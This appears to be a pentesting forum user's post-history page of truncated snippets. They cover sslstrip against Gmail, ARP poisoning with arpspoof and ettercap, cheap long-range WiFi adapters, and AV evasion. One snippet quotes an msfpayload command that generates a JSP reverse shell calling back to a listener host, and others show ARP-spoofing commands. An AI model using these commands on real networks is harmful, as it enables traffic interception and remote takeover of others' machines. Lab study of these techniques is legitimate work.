Just been doing a little reading after running in to problems using sslstrip against gmail...
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
It seems that the big boys are using...
Type: Posts; User: SilvaRizla; Keyword(s):
Just been doing a little reading after running in to problems using sslstrip against gmail...
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
It seems that the big boys are using...
If you use either of those sites your files will be distributed to the AV companies and will become detected.
This site has an option not to distribute, whether they stick by it I don't know: ...
I've just unlocked my router, through telnet how do I forward ports or enable remote management?
I found this over at Metasploit Unleashed,
relik@fortress:/pentest/exploits/framework3# ./msfpayload java/jsp_shell_reverse_tcp LHOST=10.10.1.132 LPORT=8080 R > shell.jsp && ./msfcli...
Thanks for the replies, I understand a lot more now. I'll do some further research
I seem to be missing something, and need to be pointed in the right direction if you don't mind. In my lab I have a fully patched Vista and XP box and am attacking with a BT 4 box.
As they are...
I know, but as pictures of the board are using as far as I can tell the same components and it is also rated at 500Mw I thought I'd give it a go. If its only 3% less effective than an alfa but a...
ebay: 500MW WIFI 802.11b/g 54M Wireless Lan USB Card RTL8187L
Free postage from international sellers for £18.20
It looks unbranded but should basically be the alfa awus036h
Worth a punt I...
No the 10km aerial does not come with the card and I am aware that the claim is probably BS (If you bothered to read people's posts properly you would see that).
As for the power rating you are...
Some good points raised there, although maybe you should just buy another aerial, the card is really cheap and is supported "as is" which is hard to find
Errr ok, read the thread again.
its got up to a 10km range but that'll be rural with clear line of site, should give me two or three mies urban which is more than enough for me. War-camping! Bring it on
On BT4 everything works flawlessly out of the box. Just plug it in, mac changing, monitor mode, injection, wicd, the lot. I'm so chuffed I've just bought a 18dbi yagi :D
I just thought I'd let you all know about this great high gain wifi adapter, cheap as chips, can be turned into a cantenna or other long range and works out of the box (injection and everything). I...
I have the same problem, don't suppose you could point me in the right direction?
I have solved this issue, documented here:
hxxp://ubuntuforums.org/showthread.php?t=1256274
I have the same issue, I suspect that because BT4 is based on Intrepid the version of grub that ships with it doesn't support ext4 but I'm still working on it. If anyone here can confirm that'd be...
It is not illegal to connect to an unsecured network. It is illegal to connect to an unsecured network with the intention of causing harm/mischief. Bit of a grey area yes, breaking the law? I don't...
You are using backtrack, do a fresh install on a clean machine and connect to it. Have a poke around on his machine, use ettercap's scan_poisoner plugin if you want. Then you'll know weather he has...
So is this method pretty much redundant now or has anyone found a way to encode it so they don't get caught? Also, when you migrate to a process, is this a permanent thing if you choose a boot...
Tried this now on ubuntu and Backtrack 4
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~#
root@bt:~# arpspoof -i ra0 -t 192.168.0.2 192.168.0.1
arpspoof: couldn't arp for host...
I thought this may have been the case thats why I poisoned all
Same here...
I have already set up etter.conf and am combining with sslstrip, the parts I have changed in etter.conf are:
Yes they are on the same subnet, if I run via terminal with:
sudo ettercap -T --iface ra0 -q -M arp:remote /192.168.0.1/ // ***(192.168.0.1 is router)
then it will scan and add the router to...
I'm having trouble with ettercap, when it scans for hosts it detects the router but not me (connected via wifi) so I can't arp poison, does anyone know what to do here?
Did you find an answer to this? I am experiencing the same problem